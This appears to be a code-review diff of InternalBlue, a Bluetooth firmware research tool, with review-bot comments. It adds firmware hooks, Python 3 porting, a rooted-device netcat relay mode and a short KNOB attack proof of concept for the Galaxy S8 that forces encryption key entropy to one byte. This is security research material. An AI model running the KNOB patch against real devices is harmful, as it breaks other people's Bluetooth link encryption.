// (which is the connTaskCallback anyway) with RSSI info
mov r2, #1 // 1 rssi byte
add.w r1, r7, #0x1ca // le_conn[0x1ca] is position of rssi
mov r0, r4
add r0, 14
bl 0x857B4 // __rt_memcpy
// send hci event
mov r0, r4 // back to buffer at offset 0
bl 0xE418 // bthci_event_AttemptToEnqueueEventToTransport
// undo registers for our own routine
mov r0, r7
pop {r1-r7, lr}
// branch back to _connTaskRxDone + 4
//b 0x1344D4 // on S8 with Patchlevel May 1 2019 on stock ROM
//b 0x134504 // August 30 Nightly Build
b 0x%x
""" % (RX_DONE_HOOK_ADDRESS+4)
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
exit(-1)
log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.writeMem(RX_DONE_HOOK_ADDRESS, patch):
log.critical("Installing patch for _connTaskRxDone failed!")
exit(-1)
# RXDN statistics callback variables
internalblue.last_nesn_sn = None
internalblue.last_success_event = None
def lereceiveStatusCallback(record):
"""
RXDN Callback Function
Depends on the raspi3_rxdn.py or eval_rxdn.py script,
which patches the _connTaskRxDone() function and copies
info from the LE connection struct to HCI.
"""
hcipkt = record[0] # get HCI Event packet
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.data[0:4] == "RXDN":
data = hcipkt.data[4:]
# Raspi 3 gets errors
if len(data) < 239:
return
#if raspi or s8:
packet_curr_nesn_sn = u8(data[0xa0])
#elif eval:
# packet_curr_nesn_sn = u8(data[0xa4])
packet_channel_map = data[0x54:0x7b]
packet_channel = u8(data[0x83])
packet_event_ctr = u16(data[0x8e:0x90])
packet_rssi = u8(data[0])
if internalblue.last_nesn_sn and ((internalblue.last_nesn_sn ^ packet_curr_nesn_sn) & 0b1100) != 0b1100:
log.info(" ^----------------------------- ERROR --------------------------------")
# currently only supported by eval board: check if we also went into the process payload routine,
# which probably corresponds to a correct CRC
# if self.last_success_event and (self.last_success_event + 1) != packet_event_ctr:
# log.debug(" ^----------------------------- MISSED -------------------------------")
# TODO example for setting the channel map
# timeout needs to be zero, because we are already in an event reception routine!
# self.sendHciCommand(0x2014, '\x00\x00\xff\x00\x00', timeout=0)
internalblue.last_nesn_sn = packet_curr_nesn_sn
# draw channel with rssi color
color = '\033[92m' # green
if 0xc8 > packet_rssi >= 0xc0:
color = '\033[93m' # yellow
elif packet_rssi < 0xc0:
color = '\033[91m' # red
channels_total = u8(packet_channel_map[37])
channel_map = 0x0000000000
if channels_total <= 37: # raspi 3 messes up with this during blacklisting
for channel in range(0, channels_total):
channel_map |= (0b1 << 39) >> u8(packet_channel_map[channel])
log.info("LE event %5d, map %10x, RSSI %d: %s%s*\033[0m " % (packet_event_ctr, channel_map,
(packet_rssi & 0x7f) - (128 * (packet_rssi >> 7)),
color, ' ' * packet_channel))
log.info("--------------------")
log.info("Entering InternalBlue CLI to display statistics.")
# add RXDN callback
internalblue.registerHciCallback(lereceiveStatusCallback)
# enter CLI
cli.commandLoop(internalblue)
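Review bot: Three alternative RX_DONE_HOOK_ADDRESS values for different S8 patch levels are kept as comments, and a wrong one will crash the controller; select the address from a command-line argument or a small dict keyed by patch level, and drop the commented `b 0x1344D4` / `b 0x134504` lines now that the branch is computed from RX_DONE_HOOK_ADDRESS+4. The callback has the same str-vs-bytes comparison (`"RXDN"`) and u8-on-int issues as the Nexus 5 script, and its comments ("Raspi 3 gets errors", "#if raspi or s8: / #elif eval:", "Depends on the raspi3_rxdn.py or eval_rxdn.py script") are copy-paste residue from other boards and should be removed or made S8-specific.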
+47
View File
@@ -0,0 +1,47 @@
#!/usr/bin/python2
# Jiska Classen, Secure Mobile Networking Lab
from pwn import *
from internalblue.adbcore import ADBCore
"""
This is a standalone PoC for the KNOB attack on a Samsung Galaxy S8.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = ADBCore(serial=True)
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x530F6) # connection struct key entropy
internalblue.patchRom(0x530F6, patch)
# modify global variable for own setting
internalblue.writeMem(0x255E8F, '\x01') # global key entropy
internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"Currently, there is no LMP monitoring option on Android 8.\n")
+36
View File
@@ -1 +1,37 @@
from future import standard_library
standard_library.install_aliases()
try:
from queue import Queue
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Union, NewType, Callable, Dict
if TYPE_CHECKING:
import datetime
from internalblue.hci import HCI
from internalblue.core import InternalBlue
Address = NewType("Address", int)
Record = Tuple[HCI, int, int, int, Any, datetime.datetime]
FilterFunction = Callable[[Record], bool]
ConnectionNumber = NewType("ConnectionNumber", int)
ConnectionIndex = NewType("ConnectionIndex", int)
BluetoothAddress = NewType("BluetoothAddress", bytes)
ConnectionDict = NewType("ConnectionDict", Dict[str,Any])
HeapInformation = NewType("HeapInformation", Dict[str, Any])
QueueInformation = NewType('QueueInformation', Dict[str, Any])
Opcode = NewType('Opcode', int)
HCI_CMD = NewType('HCI_CMD', int)
Task = Tuple[HCI_CMD, bytes, Queue.Queue, Callable[[Record], bool]]
Device = NewType("Device", Dict[str, Any])
"""{"dev_id": dev_id,
"dev_name": dev_name,
"dev_bdaddr": dev_bdaddr,
"dev_flags": dev_flags,
"dev_flags_str": dev_flags_str}"""
# InternalBlueCore, Device Name, SomeString
DeviceTuple = Tuple[InternalBlue, str, str]
except:
pass
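Review bot: `Task = Tuple[HCI_CMD, bytes, Queue.Queue, ...]` raises AttributeError, because `Queue` is imported as the class (`from queue import Queue`), not the module; it should be just `Queue`. The bare `except: pass` around the whole block hides exactly this failure (and any ImportError of typing), so every alias in the module silently ends up undefined; catch ImportError only and move the NewType definitions outside the try. The bare string after `Device = NewType(...)` listing the dict keys is not attached to anything; make it a comment. `ConnectionDict = NewType("ConnectionDict", Dict[str,Any])` is missing the space after the comma used everywhere else.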
+101 -14
View File
@@ -1,21 +1,27 @@
#!/usr/bin/env python2
from future import standard_library
standard_library.install_aliases()
from builtins import str
import datetime
import socket
import Queue
import queue as queue2k
import random
import hci
from internalblue import hci
from internalblue.utils import bytes_to_hex
from pwn import *
from core import InternalBlue
from .core import InternalBlue
class ADBCore(InternalBlue):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory="."):
super(ADBCore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory)
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', serial=False, data_directory=".", replay=False):
super(ADBCore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory, replay)
self.hciport = None # hciport is the port number of the forwarded HCI snoop port (8872). The inject port is at hciport+1
self.serial = serial # use serial su busybox scripting and do not try bluetooth.default.so
self.doublecheck = False
def device_list(self):
"""
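Review bot: the shebang `#!/usr/bin/env python2` is left as the first line of a module this commit is making Python 3 compatible; change it to `python3` (or drop it, since the module is imported rather than executed). Both old and new `__init__` signatures also default `fix_binutils='True'` as a string, which is truthy even when a caller passes `'False'`; a real boolean `True` would avoid that trap.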
@@ -29,6 +35,8 @@ class ADBCore(InternalBlue):
log.warn("Already running. call shutdown() first!")
return []
if self.replay:
return [(self, "adb_replay", 'adb: ReplayDevice' )]
# Check for connected adb devices
try:
adb_devices = adb.devices()
@@ -42,12 +50,12 @@ class ADBCore(InternalBlue):
log.info("No adb devices found.")
return []
# At least one device fonund
# At least one device found
log.info("Found multiple adb devices")
# Enumerate over found devices and put them into an array of tupple
# First index is a self reference of the class
# Scond index is the identifier which is passed to connect()
# Second index is the identifier which is passed to connect()
# Third index is the label which is shown in options(...)
device_list = []
for d in adb_devices:
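Review bot: the corrected comment now reads "At least one device found" but the log line right after it still says `"Found multiple adb devices"`, which is wrong for the single-device case; `"Found %d adb device(s)" % len(adb_devices)` would match. The neighbouring comment typo "tupple" was left while "fonund" and "Scond" were fixed.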
@@ -65,6 +73,19 @@ class ADBCore(InternalBlue):
context.device = self.interface
# setup sockets
# on magisk-rooted devices there is sometimes already a read socket and this first setup needs to be skipped...
if not self.serial:
if not self._setupSockets():
log.info("Could not connect using Bluetooth module.")
log.info("Trying to set up connection for rooted smartphone with busybox installed.")
else:
return True # successfully finished setup with bluetooth.default.so
if not self._setupSerialSu():
log.critical("Failed to setup scripts for rooted devices.")
return False
# try again
if not self._setupSockets():
log.critical("No connection to target device.")
log.info("Check if:\n -> Bluetooth is active\n -> Bluetooth Stack has Debug Enabled\n -> BT HCI snoop log is activated\n -> USB debugging is authorized\n")
@@ -124,7 +145,7 @@ class ADBCore(InternalBlue):
while(not self.exit_requested and len(record_hdr) < 24):
try:
recv_data = self.s_snoop.recv(24 - len(record_hdr))
log.debug("recvThreadFunc: received bt_snoop data " + recv_data.encode('hex'))
log.debug("recvThreadFunc: received bt_snoop data " + bytes_to_hex(recv_data))
if len(recv_data) == 0:
log.info("recvThreadFunc: bt_snoop socket was closed by remote site. stopping recv thread...")
self.exit_requested = True
@@ -146,7 +167,7 @@ class ADBCore(InternalBlue):
orig_len, inc_len, flags, drops, time64 = struct.unpack( ">IIIIq", record_hdr)
# Read the record data
record_data = b''
record_data = bytearray()
while(not self.exit_requested and len(record_data) < inc_len):
try:
recv_data = self.s_snoop.recv(inc_len - len(record_data))
@@ -154,7 +175,7 @@ class ADBCore(InternalBlue):
log.info("recvThreadFunc: bt_snoop socket was closed by remote site. stopping..")
self.exit_requested = True
break
record_data += recv_data
record_data += bytearray(recv_data)
except socket.timeout:
pass # this is ok. just try again without error
@@ -184,7 +205,7 @@ class ADBCore(InternalBlue):
if filter_function == None or filter_function(record):
try:
queue.put(record, block=False)
except Queue.Full:
except queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..")
# Call all callback functions inside registeredHciCallbacks and pass the
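Review bot: `except queue.Full:` refers to the local loop variable `queue` (the `Queue` instance used in `queue.put(record, block=False)` two lines up), not the module, and a `Queue` object has no `Full` attribute, so the first time `put` actually raises the except clause itself dies with `AttributeError`. Given the `import queue as queue2k` alias introduced at the top of this file, this must be `except queue2k.Full:`.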
@@ -193,9 +214,9 @@ class ADBCore(InternalBlue):
callback(record)
# Check if the stackDumpReceiver has noticed that the chip crashed.
if self.stackDumpReceiver.stack_dump_has_happend:
# if self.stackDumpReceiver and self.stackDumpReceiver.stack_dump_has_happend:
# A stack dump has happend!
log.warn("recvThreadFunc: The controller send a stack dump.")
# log.warn("recvThreadFunc: The controller sent a stack dump.")
# self.exit_requested = True
log.debug("Receive Thread terminated.")
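Review bot: commenting out the `stack_dump_has_happend` check silently removes the controller-crash warning from the ADB receive path, with no explanation in the hunk. If the goal is to tolerate `stackDumpReceiver` being `None`, keep the guarded form `if self.stackDumpReceiver and self.stackDumpReceiver.stack_dump_has_happend:` active instead of leaving it as a comment; otherwise say why the detection is disabled.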
@@ -212,7 +233,7 @@ class ADBCore(InternalBlue):
# (with multiple attached Android devices) we must not hard code the
# forwarded port numbers. Therefore we choose the port numbers
# randomly and hope that they are not already in use.
self.hciport = random.randint(60000, 65535)
self.hciport = random.randint(60000, 65534) # minus 1, as we are using hciport + 1
log.debug("_setupSockets: Selected random ports snoop=%d and inject=%d" % (self.hciport, self.hciport + 1))
# Forward ports 8872 and 8873. Ignore log.info() outputs by the adb function.
@@ -247,8 +268,10 @@ class ADBCore(InternalBlue):
self.s_inject.close()
self.s_snoop.close()
self.s_inject = self.s_snoop = None
context.log_level = 'warn'
adb.adb(["forward", "--remove", "tcp:%d" % (self.hciport)])
adb.adb(["forward", "--remove", "tcp:%d" % (self.hciport + 1)])
context.log_level = saved_loglevel
return False
return True
@@ -274,3 +297,67 @@ class ADBCore(InternalBlue):
return False
finally:
context.log_level = saved_loglevel
def _setupSerialSu(self):
"""
To run on any rooted device, we can also use some shellscripting.
This is slower but at least works on any device.
Commands on a S10e with Samsung Stock ROM + Magisk + busybox:
tail -f -n +0 /data/log/bt/btsnoop_hci.log | nc -l -p 8872
nc -l -p 8873 >/sdcard/internalblue_input.bin
tail -f /sdcard/internalblue_input.bin >>/dev/ttySAC1
Locations of the Bluetooth serial interface and btsnoop log file might differ.
The second part *could* be combined, but it somehow does not work (SELinux?).
The ADB Python bindings will kill the processes automatically :)
"""
# In sending direction, the format is different.
self.serial = True
saved_loglevel = context.log_level
context.log_level = 'warn'
try:
# check dependencies
if adb.which('su') is None:
log.critical("su not found, rooted smartphone required!")
return False
if adb.process(['su', '-c', 'which', 'nc']).recvall() == '':
log.critical("nc not found, install busybox!")
return False
# automatically detect the proper serial device with lsof
logfile = adb.process(["su", "-c", "lsof | grep btsnoop_hci.log | awk '{print $NF}'"]).recvall().strip()
log.info("Android btsnoop logfile %s...", logfile)
interface = adb.process(["su", "-c", "lsof | grep bluetooth | grep tty | awk '{print $NF}'"]).recvall().strip()
log.info("Android Bluetooth interface %s...", interface)
if logfile == '':
log.critical("Could not find Bluetooth logfile. Enable Bluetooth snoop logging.")
return False
if interface == '':
log.critical("Could not find Bluetooth interface. Enable Bluetooth.")
return False
# spawn processes
adb.process(["su", "-c", 'tail -f -n +0 %s | nc -l -p 8872' % logfile])
adb.process(["su", "-c", "nc -l -p 8873 >/sdcard/internalblue_input.bin"])
adb.process(["su", "-c", "tail -f /sdcard/internalblue_input.bin >>%s" % interface])
sleep(2)
except PwnlibException as e:
log.warn("Serial scripting setup failed: " + str(e))
return False
finally:
context.log_level = saved_loglevel
return True
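Review bot: the dependency and detection checks compare `recvall()` / `.strip()` results against `''`, but on Python 3 these are bytes, so `== ''` is never true and a missing `nc`, log file or tty is not detected; the same bytes value is then formatted into the shell strings (`'tail -f -n +0 %s | nc -l -p 8872' % logfile`), producing `b'/data/...'` in the command. Decode the outputs once (`.recvall().strip().decode()`) and compare against `b''`/`''` consistently. Separately, `/sdcard/internalblue_input.bin` sits on shared storage, and everything appended to it is relayed by `tail -f` onto the Bluetooth serial interface, so any app with storage access can inject traffic into the controller while this mode is active; a private path (for example under `/data/local/tmp`) with a restrictive mode would close that.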
+124 -28
@@ -28,16 +28,27 @@
# Software.
from __future__ import print_function
from builtins import str
from pwn import *
import os
import traceback
import argparse
from adbcore import ADBCore
from hcicore import HCICore
from ioscore import iOSCore
from .adbcore import ADBCore
from .hcicore import HCICore
from sys import platform
import cmds
from . import cmds
try:
import typing
from typing import List, Optional
from internalblue.core import InternalBlue
from . import DeviceTuple
except:
pass
HISTFILE = "_internalblue.hist"
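Review bot: `socket.error` in `commandLoop` and `sys.argv[1:]` in the `__main__` guard further down rely on `from pwn import *` happening to re-export `socket` and `sys`; add explicit `import socket` and `import sys` next to `import os` so the module does not break if pwntools changes what it exports.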
@@ -53,11 +64,15 @@ type <help> for usage information!\n\n"""
for line in banner:
term.output(text.blue(line))
def commandLoop(internalblue):
def commandLoop(internalblue, init_commands=None):
cmdstack = init_commands.split(';')[::-1] if init_commands else None
while internalblue.running and not internalblue.exit_requested:
cmd_instance = None
try:
cmdline = term.readline.readline(prompt='> ').strip()
if cmdstack:
cmdline = cmdstack.pop().strip()
else:
cmdline = term.readline.readline(prompt='> ').strip().decode('utf-8')
cmdword = cmdline.split(' ')[0].split('=')[0]
if(cmdword == ''):
continue
@@ -67,12 +82,11 @@ def commandLoop(internalblue):
log.warn("Command unknown: " + cmdline)
continue
cmd_instance = matching_cmd(cmdline, internalblue)
if(not cmd_instance.work()):
log.warn("Command failed: " + str(cmd_instance))
except ValueError as e:
log.warn("commandLoop: ValueError: " + str(e))
continue
raise
except KeyboardInterrupt:
if(cmd_instance != None):
cmd_instance.abort_cmd()
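Review bot: replacing the `log.warn(...)`/`continue` for `ValueError` with a bare `raise` means a single malformed argument (for example a bad integer) now aborts the whole interactive session, not just the command. If re-raising is only wanted for the test harness, gate it (for instance on `init_commands` being set) and keep the warn-and-continue path for interactive use.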
@@ -80,25 +94,42 @@ def commandLoop(internalblue):
log.info("Got Ctrl-C; exiting...")
internalblue.exit_requested = True
break
except AssertionError as e:
raise
except socket.error as e:
if e.args == (1, "Operation not permitted"):
log.critical("Received an 'Operation not permitted' socket.error, you might need root for the command '{}'".format(cmdline))
log.critical(traceback.format_exc())
except Exception as e:
internalblue.exit_requested = True # Make sure all threads terminate
log.critical("Uncaught exception (%s). Abort." % str(e))
print(traceback.format_exc())
break
raise
cmd_instance = None
# Main Program Start
def internalblue_cli():
print_banner()
def _parse_argv(argv):
parser = argparse.ArgumentParser()
parser.add_argument("--data-directory", "-d", help="Set data directory. Default: ~/.internalblue")
parser.add_argument("--verbose", "-v", help="Set log level to DEBUG", action="store_true")
parser.add_argument("--ios-device", "-i", help="Tell internalblue to connect to a remote iPhone HCI socket. Specify socket IP address and port")
args = parser.parse_args()
parser.add_argument("--ios-device", "-i", help="Tell internalblue to connect to a remote iPhone HCI socket. Specify socket IP address and port (i.e., 172.20.10.1:1234).")
parser.add_argument("--serialsu", "-s", help="On ADB, directly try su/serial/busybox scripting, if you do not have a special bluetooth.default.so file.", action="store_true")
parser.add_argument("--testdevice", "-t", help="Use a dummy test device to execute testcases", action="store_true")
parser.add_argument("--trace", help="Trace hci connection")
parser.add_argument("--device", help="Specify device/core to be used")
parser.add_argument("--commands", "-c", help="CLI command to run before prompting, seperated by ';' (used for easier testing)")
parser.add_argument("--replay", help="Intercept and replace every communication with the core with the one in the specified file")
parser.add_argument("--save", help="Store a trace into the file that can be used with --replay")
return parser.parse_args(argv)
if args.data_directory != None:
# Main Program Start
def internalblue_cli(argv, args=None):
#print_banner()
args = args or _parse_argv(argv)
if args.data_directory is not None:
data_directory = args.data_directory
else:
data_directory = os.path.expanduser("~") + "/.internalblue"
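Review bot: in the generic `except Exception` handler, if the `break` is kept directly above the new `raise`, the `raise` is unreachable; drop the `break` since the re-raise already leaves the loop. In the new `_parse_argv` help strings, "seperated" should be "separated" and the `--ios-device` example should be introduced with "e.g." rather than "i.e.". `print_banner()` is commented out without a note on whether the banner is gone for good or only during testing.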
@@ -118,21 +149,84 @@ def internalblue_cli():
readline_completer = term.completer.LongestPrefixCompleter(words=cmd_keywords)
term.readline.set_completer(readline_completer)
if args.trace:
from .socket_hooks import hook
from internalblue import socket_hooks
HookClass = getattr(socket_hooks, args.trace)
hook(HCICore, HookClass)
hook(ADBCore, HookClass)
elif args.save:
from .socket_hooks import hook, TraceToFileHook
hook(HCICore, TraceToFileHook, filename=args.save)
hook(ADBCore, TraceToFileHook, filename=args.save)
# Initalize cores and get devices
if args.ios_device:
connection_methods = [iOSCore(args.ios_device, log_level=log_level,
data_directory=data_directory)]
# As macOS has additional dependencies (objc), only import it here if needed
connection_methods = [] # type: List[InternalBlue]
if args.replay:
from .socket_hooks import hook, ReplaySocket
from .macoscore import macOSCore
replay_devices = ['macos_replay', 'adb_replay', 'hci_replay', 'ios_replay']
if args.device == "macos_replay":
from .macoscore import macOSCore
hook(macOSCore, ReplaySocket, filename=args.replay)
connection_methods = [macOSCore(log_level=log_level, data_directory=data_directory, replay=True)]
elif args.device == "hci_replay":
hook(HCICore, ReplaySocket, filename=args.replay)
connection_methods = [HCICore(log_level=log_level, data_directory=data_directory, replay=True)]
elif args.device == "adb_replay":
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level=log_level, data_directory=data_directory, replay=True)]
elif args.device == "ios_replay":
raise NotImplementedError("ios replay is not implemented yet")
else:
raise ValueError("--device is required with --replay and has to be one of {}".format(replay_devices))
elif args.ios_device:
from .ioscore import iOSCore
connection_methods = [iOSCore(args.ios_device, log_level=log_level, data_directory=data_directory)]
elif args.testdevice:
from .testcore import testCore
connection_methods = [testCore(log_level=log_level, data_directory=data_directory)]
elif platform == "darwin":
from .macoscore import macOSCore
connection_methods = [
macOSCore(log_level=log_level, data_directory=data_directory, replay=(args.replay and args.device == 'mac')),
ADBCore(log_level=log_level, data_directory=data_directory)]
if args.trace:
hook(macOSCore, HookClass)
elif args.save:
hook(macOSCore, TraceToFileHook, filename=args.save)
else:
connection_methods = [
ADBCore(log_level=log_level, data_directory=data_directory),
ADBCore(log_level=log_level, data_directory=data_directory, serial=args.serialsu),
HCICore(log_level=log_level, data_directory=data_directory)]
devices = []
devices = [] # type: List[DeviceTuple]
for connection_method in connection_methods:
devices.extend(connection_method.device_list())
device = None # type: Optional[DeviceTuple]
if len(devices) > 0:
if len(devices) == 1:
if args.replay:
# There should only be one device that was created when --replay was passed
device = devices[0]
elif args.device:
matching_devices = [ dev for dev in devices if dev[1] == args.device]
if len(matching_devices) > 1:
log.critical("Found multiple matching devices")
exit(-1)
elif len(matching_devices) == 1:
log.info("Found device is: {}".format(matching_devices[0]))
device = matching_devices[0]
else:
log.critical("No matching devices found")
exit(-1)
elif len(devices) == 1:
device = devices[0]
else:
i = options('Please specify device:', [d[2] for d in devices], 0)
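Review bot: in the `platform == "darwin"` branch, `replay=(args.replay and args.device == 'mac')` is always `False`: the branch is only reached when `args.replay` is falsy, and the replay device name used everywhere else is `'macos_replay'`, not `'mac'`; drop the argument. The same branch constructs `ADBCore(...)` without `serial=args.serialsu`, so `--serialsu` is silently ignored on macOS while the `else` branch honours it.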
@@ -145,7 +239,7 @@ def internalblue_cli():
# Restore readline history:
if os.path.exists(reference.data_directory + "/" + HISTFILE):
readline_history = read(reference.data_directory + "/" + HISTFILE)
term.readline.history = readline_history.split('\n')
term.readline.history = readline_history.split(b'\n')
# Connect to device
if not reference.connect():
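Review bot: `readline_history.split(b'\n')` fills `term.readline.history` with bytes entries, while lines typed during the session are `str` (the `.decode('utf-8')` in `commandLoop`), leaving a mixed-type history; decoding once (`read(...).decode('utf-8').split('\n')`) keeps it uniformly `str`, which is also what the history-saving code joins with `"\n"`.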
@@ -153,20 +247,22 @@ def internalblue_cli():
exit(-1)
# Enter command loop (runs until user quits)
commandLoop(reference)
log.info("Starting commandLoop for reference {}".format(reference))
commandLoop(reference, init_commands=args.commands)
# shutdown connection
reference.shutdown()
# Save readline history:
f = open(reference.data_directory + "/" + HISTFILE, "w")
f.write("\n".join(term.readline.history))
f.close()
# TODO: - This causes issues, have to fix ASAP
# f = open(reference.data_directory + "/" + HISTFILE, "w")
# f.write("\n".join(term.readline.history))
# f.close()
# Cleanup
log.info("Goodbye")
if __name__ == "__main__":
internalblue_cli()
internalblue_cli(sys.argv[1:])
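Review bot: disabling the history save with a "TODO: fix ASAP" means command history is read at start-up but never written back, so the file only ever shrinks to whatever it held before this commit. The failure this works around is most likely the bytes/str mix introduced by `split(b'\n')` when the history is restored; with a `str` history the three commented lines can be re-enabled as they were.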
+153 -54
@@ -23,6 +23,11 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import print_function
from builtins import str
from builtins import hex
from builtins import range
from builtins import object
from pwn import *
import os
import sys
@@ -35,8 +40,24 @@ import struct
import time
import select
import json
from internalblue.utils import bytes_to_hex
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Type
if TYPE_CHECKING:
from internalblue.core import InternalBlue
from internalblue.hci import HCI
from internalblue import Record, BluetoothAddress, Address
except:
pass
def getCmdList():
# type: () -> List[Type['Cmd']]
""" Returns a list of all commands which are defined in this cmds.py file.
This is done by searching for all subclasses of Cmd
"""
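Review bot: the bare `except: pass` around the `typing` imports also swallows `KeyboardInterrupt` and `SystemExit`; `except ImportError: pass` is the intended scope here.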
@@ -44,6 +65,7 @@ def getCmdList():
if inspect.isclass(obj) and issubclass(obj, Cmd)][1:]
def findCmd(keyword):
# type: (str) -> Optional[Type['Cmd']]
""" Find and return a Cmd subclass for a given keyword.
"""
command_list = getCmdList()
@@ -61,11 +83,13 @@ def auto_int(x):
return int(x, 0)
def bt_addr_to_str(bt_addr):
# type: (BluetoothAddress) -> str
""" Convert a Bluetooth address (6 bytes) into a human readable format.
"""
return ":".join([b.encode("hex") for b in bt_addr])
return ":".join(format(x, '02x') for x in bytearray(bt_addr))
def parse_bt_addr(bt_addr):
# type: (Any) -> Optional[BluetoothAddress]
""" Convert Bluetooth address argument and check lengths.
"""
addr = bt_addr
@@ -86,17 +110,18 @@ def parse_bt_addr(bt_addr):
return addr
class Cmd:
class Cmd(object):
""" This class is the superclass of a CLI command. Every CLI command
must be defined as subclass of Cmd. The subclass must define the
'keywords' list as member variable. The actual implementation of the
command should be located in the work() method.
"""
keywords = []
keywords = [] # type: List[str]
memory_image = None
memory_image = None # type: Optional[bytes]
def __init__(self, cmdline, internalblue):
# type: (str, InternalBlue) -> None
self.cmdline = cmdline
self.internalblue = internalblue
self.memory_image_template_filename = internalblue.data_directory + "/memdump__template.bin"
@@ -105,23 +130,28 @@ class Cmd:
self.internalblue.fw.__name__[6:12] + "_template.bin"
def __str__(self):
# type: () -> str
return self.cmdline
def work(self):
# type: () -> bool
return True
def abort_cmd(self):
# type: () -> None
self.aborted = True
if hasattr(self, 'progress_log'):
self.progress_log.failure("Command aborted")
def getArgs(self):
# type: () -> Any
try:
return self.parser.parse_args(self.cmdline.split(' ')[1:])
except SystemExit:
return None
def isAddressInSections(self, address, length=0, sectiontype=""):
# type: (int, int, str) -> bool
if not self.internalblue.fw:
return False
@@ -137,12 +167,15 @@ class Cmd:
return False
def readMem(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
# type: (Address, int, Optional[Any], int, int) -> Optional[bytes]
return self.internalblue.readMem(address, length, progress_log, bytes_done, bytes_total)
def writeMem(self, address, data, progress_log=None, bytes_done=0, bytes_total=0):
# type: (Address, bytes, Optional[Any], int, int) -> bool
return self.internalblue.writeMem(address, data, progress_log, bytes_done, bytes_total)
def initMemoryImage(self):
# type: () -> None
"""
Initially read out a chip's memory, all sections (RAM+ROM).
:return:
@@ -168,6 +201,7 @@ class Cmd:
self.refreshMemoryImage()
def refreshMemoryImage(self):
# type: () -> None
"""
Update an existing memory dump, only RAM sections.
:return:
@@ -178,11 +212,13 @@ class Cmd:
for section in self.internalblue.fw.SECTIONS:
if not section.is_rom:
sectiondump = self.readMem(section.start_addr, section.size(), self.progress_log, bytes_done, bytes_total)
Cmd.memory_image = Cmd.memory_image[0:section.start_addr] + sectiondump + Cmd.memory_image[section.end_addr:]
bytes_done += section.size()
if sectiondump and Cmd.memory_image:
Cmd.memory_image = Cmd.memory_image[0:section.start_addr] + sectiondump + Cmd.memory_image[section.end_addr:]
bytes_done += section.size()
self.progress_log.success("Received Data: complete")
def getMemoryImage(self, refresh=False):
# type: (bool) -> Any
if Cmd.memory_image is None:
self.initMemoryImage()
elif refresh:
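Review bot: moving `bytes_done += section.size()` inside the new `if sectiondump and Cmd.memory_image:` guard means a failed section read both stalls the progress counter and is skipped without any message. Keep the increment outside the guard and add a `log.warn` naming the section that could not be read.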
@@ -253,7 +289,8 @@ class CmdLogLevel(Cmd):
log_levels = ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
for keyword in list(keywords):
keywords.extend(['%s %s' % (keyword, log_level) for log_level in log_levels])
for log_level in log_levels:
keywords.append('%s %s' % (keyword, log_level))
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
@@ -285,7 +322,7 @@ class CmdMonitor(Cmd):
parser.add_argument("command",
help="One of: start, stop, kill")
class MonitorController:
class MonitorController(object):
instance = None
@staticmethod
@@ -295,7 +332,7 @@ class CmdMonitor(Cmd):
CmdMonitor.MonitorController.instance = CmdMonitor.MonitorController.__MonitorController(internalblue, 0xC9)
return CmdMonitor.MonitorController.instance
class __MonitorController:
class __MonitorController(object):
def __init__(self, internalblue, pcap_data_link_type):
self.internalblue = internalblue
self.running = False
@@ -410,6 +447,7 @@ class CmdMonitor(Cmd):
self.wireshark_process = None
def adbhciCallback(self, record):
# type: (Record) -> None
hcipkt, orig_len, inc_len, flags, drops, recvtime = record
dummy = "\x00\x00\x00" # TODO: Figure out purpose of these fields
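Review bot: `dummy = "\x00\x00\x00"` is still a `str` literal; once `hcipkt` and the other record fields are bytes, concatenating this into the pcap record raises `TypeError` on Python 3. Make it `b"\x00\x00\x00"` as part of this bytes clean-up.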
@@ -502,6 +540,7 @@ class CmdDumpMem(Cmd):
help="Only dump the two RAM sections.")
parser.add_argument("--file", "-f", default="memdump.bin",
help="Filename of memory dump (default: %(default)s)")
parser.add_argument("--overwrite", action='store_true')
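Review bot: the new `--overwrite` argument is the only one in this parser without a `help=` string; something like `help="Overwrite existing dump files without asking"` keeps the `help` output complete.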
def work(self):
args = self.getArgs()
@@ -513,10 +552,10 @@ class CmdDumpMem(Cmd):
bytes_total = sum([s.size() for s in self.internalblue.fw.SECTIONS if s.is_ram])
bytes_done = 0
self.progress_log = log.progress("Downloading RAM sections...")
for section in filter(lambda s: s.is_ram, self.internalblue.fw.SECTIONS):
for section in [s for s in self.internalblue.fw.SECTIONS if s.is_ram]:
filename = args.file + "_" + hex(section.start_addr)
if os.path.exists(filename):
if not yesno("Update '%s'?" % filename):
if not (args.overwrite or yesno("Update '%s'?" % filename)):
log.info("Skipping section @%s" % hex(section.start_addr))
bytes_done += section.size()
continue
@@ -530,7 +569,7 @@ class CmdDumpMem(Cmd):
# Get complete memory image
if os.path.exists(args.file):
